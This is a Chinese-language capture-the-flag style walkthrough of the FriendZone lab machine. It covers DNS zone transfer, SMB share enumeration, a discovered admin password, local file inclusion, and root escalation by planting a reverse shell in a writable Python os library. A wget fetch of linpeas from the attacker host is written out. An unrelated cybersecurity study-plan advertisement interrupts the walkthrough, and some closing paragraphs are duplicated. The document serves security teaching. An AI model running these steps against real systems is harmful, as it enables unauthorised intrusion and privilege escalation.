网络安全实战：记一次比较完整的靶机渗透

网络安全实战：记一次比较完整的靶机渗透

0x01信息搜集

nmap -sC -sV -p- -A 10.10.10.123 -T4 -oA nmap_friendzone

访问80端口的http服务只发现了一个域名。

0x02 DNS区域传输

因为我们前面扫描的时候发现了53端口是开着一个dns服务的，所以尝试使用friendzoneportal.red进行axfr，它的具体含义简单来说就是使用dig命令向服务器发送一个axfr的请求，如果服务器支持axfr，那么就会把请求的域对应的所有的dns记录都返回给请求者。学习计划安排

学习路线图大纲总览

网络安全入门学习路线

其实入门网络安全要学的东西不算多，也就是网络基础+操作系统+中间件+数据库，四个流程下来就差不多了。

1.网络安全法和了解电脑基础

其中包括操作系统Windows基础和Linux基础，标记语言HTML基础和代码JS基础，以及网络基础、数据库基础和虚拟机使用等…

别被这些看上去很多的东西给吓到了，其实都是很简单的基础知识，同学们看完基本上都能掌握。计算机专业的同学都应该接触了解过，这部分可以直接略过。没学过的同学也不要慌，可以去B站搜索相关视频，你搜关键词网络安全工程师会出现很多相关的视频教程，我粗略的看了一下，排名第一的视频就讲的很详细。

当然你也可以看下面这个视频教程仅展示部分截图：

学到http和https抓包后能读懂它在说什么就行。

2.网络基础和编程语言

3.入手Web安全

web是对外开放的，自然成了黑客的重点关照对象，有事没事就来入侵一波，你说不管能行吗！

想学好Web安全，咱首先得先弄清web是怎么搭建的，知道它的构造才能精准打击。所以web前端和web后端的知识多少要了解点，然后再学点python，起码得看懂部分代码吧。

最后网站开发知识多少也要了解点，不过别紧张，只是学习基础知识。

等你用几周的时间学完这些，基本上算是具备了入门合格渗透工程师的资格，记得上述的重点要重点关注哦！

再就是，要正式进入web安全领域，得学会web渗透，OWASP TOP 10等常见Web漏洞原理与利用方式需要掌握，像SQL注入/XSS跨站脚本攻击/Webshell木马编写/命令执行等。

这个过程并不枯燥，一边打怪刷级一边成长岂不美哉，每个攻击手段都能让你玩得不亦乐乎，而且总有更猥琐的方法等着你去实践。

学完web渗透还不算完，还得掌握相关系统层面漏洞，像ms17-010永恒之蓝等各种微软ms漏洞，所以要学习后渗透。可能到这里大家已经不知所云了，不过不要紧，等你学会了web渗透再来看会发现很简单。

其实学会了这几步，你就正式从新手小白晋升为入门学员了，真的不算难，你上你也行。

4.安全体系

不过我们这个水平也就算个渗透测试工程师，也就只能做个基础的安全服务，而这个领域还有很多业务，像攻防演练、等保测评、风险评估等，我们的能力根本不够看。

所以想要成为一名合格的网络工程师，想要拿到安全公司的offer，还得再掌握更多的网络安全知识，能力再更上一层楼才行。即便以后进入企业，也需要学习很多新知识，不充实自己的技能就会被淘汰。

从时代发展的角度看，网络安全的知识是学不完的，而且以后要学的会更多，同学们要摆正心态，既然选择入门网络安全，就不能仅仅只是入门程度而已，能力越强机会才越多。

英文：portal    汉语：统一门户平台

通过上图我们发现，服务器竟然支持了我们的axfr请求，返回给了我们请求域中所有的dns记录，既然我们拿到了当前域中所有的子域名，那么我们就可以把这些子域名都加到kali的hosts文件中。

补充知识：从安全配置的角度出发，服务器是不应当响应每个人的axfr请求的，它应该是只在同一域中主、备服务器之间使用的请求，通常用于实现主、备dns服务器间同步dns记录的作用。这里dns服务器响应了我们的axfr请求，其实是说明了该dns服务器存在配置不当的的问题的。

然后又尝试使用friendzone.red进行axfx。

dig axfr friendzone.red @10.10.10.123

使用shell命令对输出结果进行过滤和去重

dig axfr friendzoneportal.red @10.10.10.123 |grep 604800|awk '{print $1}'|sed s/.$//g|sort|uniq
dig axfr friendzone.red @10.10.10.123 |grep 604800|awk '{print $1}'|sed s/.$//g|sort|uniq
#解析shell命令
grep 604800     匹配含有604800数字的行
awk'{print $1}' 将一行中以空格为分割符的第一个字段打印出来
sed s/.$//g     将以点结尾的字符串末尾的点替换为空
sort            排序
uniq            删除文件中的重复行

我们可以看到通过上面这些命令的处理，我们得到了好多域名。

然后把这些域名都加入到/etc/hosts里面

administrator1.friendzone.red friendzone.red hr.friendzone.red uploads.friendzone.red admin.friendzoneportal.red files.friendzoneportal.red friendzoneportal.red imports.friendzoneportal.red 

因为这么多域名我们不可能挨个去手动访问，所以我们这里用工具来批量测试，在使用工具之前，我们需要首先把所有的域名放到一个文件里面，我这里放在了name文件里，然后我们通过如下简单的shell脚本，把这些域名处理成工具可以识别的url链接并写入到名为url的文件中，便于我们下一步的利用。

for i in $(cat name);do echo https://$i >>url;done
for i in $(cat name);do echo http://$i >>url;done

我这里推荐一个好用的工具aquatone，之所以推荐它是因为我觉得它解决了我们在渗透测试过程中的一个痛点，例如我们在HW打点或者日常渗透的过程中，经常会遇到通过类似fofa这种搜索引擎或者其他的途径搜集到了大量的资产链接，虽然fofa之类的搜索引擎会显示资产的访问状态，但往往与当下该资产的访问状态有差异，因此手工判断的话效率会很低，但是使用了这个工具后就会方便很多，我们直接把所有资产的URL链接放到一个文件里，使用这个工具直接测试一下就行了，该工具会直接显示这些资产当下的访问状态，并截屏，当扫描结束后，会直接出一个html的报告，十分的方便。

#这个工具的下载命令我直接放这里了！ 
sudo apt install chromium-l10n
wget https://github.com/michenriksen/aquatone/releases/download/v1.7.0/aquatone_linux_amd64_1.7.0.zip
unzip aquatone_linux_amd64_1.7.0.zip
sudo rm -rif aquatone_linux_amd64_1.7.0.zip LICENSE.txt README-cloudshell.txt
sudo mv aquatone /usr/local/bin
cat url |aquatone

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-OJ6V8nhj-1673957521827)(https://p3-sign.toutiaoimg.com/tos-cn-i-qvj2lq49k0/88d09da328534829aa81f031f899a394~noop.image?_iz=58558&from=article.pc_detail&x-expires=1673963562&x-signature=DpDszWko5jJoHMG1YPJU61P6dio%3D)]

下图是该工具出的报告。

我从报告中找到这么一个页面，尝试爆破后没结果，暂时放这。

0x03 SMB文件上传

因为前面nmap扫描结果显示该机器开放了smb服务，我们接下来对smb服务进行一波测试。

crackmapexec smb 10.10.10.123 -u "" -p "" --shares

发现Development 目录具有读权限和写权限，general目录有读权限。

smbclient //10.10.10.123/genera

通过找到的密码尝试登录。

admin:WORKWORKHhallelujah@#

成功进入后台。

0x04文件包含

根据页面提示加上如下参数后访问，发现出来一个时间戳。

怀疑此处存在文件包含于是进行测试。

通过上图我们可以看到，此处的确是存在一个本地文件包含漏洞，现在我们尝试读取dashboard文件，我们来看看它代码是怎么写的。

我们可以看到它直接通过get传参给include，然后后面接了.php。

结合之前发现的smb服务Development目录下的写权限，此时getshell的思路就很清晰了，先通过smb服务上传到Development目录下一个含有反弹shell代码的php文件，然后利用此处的文件包含漏洞即可getshell。

0x05权限提升

python3 -m http.server 80
wget 10.10.16.3/linpeas.sh

我们在linpeas.sh的报告中看到如下文件，发现我们竟然对python的OS库有写权限。

那我们接下来就传pspy64到该机器上来，然后看看有没有以root用户定期执行的py脚本调用了os库，如果有的话，我们在OS库中写入反弹shell的代码，这样当该脚本被执行时，我们就会获得一个root权限的shell。

然后如上图所示，我们看到这个脚本是以root权限运行的，并且该脚本调用了OS库，所以接下来我们只需要在OS库中写入反弹shell的代码即可，如下图所示。

上图框中的代码就是我们加到os.py文件末尾反弹shell的代码，通过下图我们可以看到root权限的shell已经弹回来了。

friendzone靶机算是一个中等难度的靶机，知识点涉及到了DNS区域传输、SMB文件上传、文件包含、以及非常规的linux提权等知识。

[外链图片转存中…(img-D4LybWUj-1673957521836)]

上图框中的代码就是我们加到os.py文件末尾反弹shell的代码，通过下图我们可以看到root权限的shell已经弹回来了。

[外链图片转存中…(img-NLQuQD0N-1673957521837)]

friendzone靶机算是一个中等难度的靶机，知识点涉及到了DNS区域传输、SMB文件上传、文件包含、以及非常规的linux提权等知识。

[外链图片转存中…(img-oLZpd9Ce-1673957521837)]

总的来说，还是学到不少知识，包括DNS区域传输，SMB文件上传配合文件包含漏洞getshell，利用写入OS库恶意代码配合定时任务成功提权至root权限。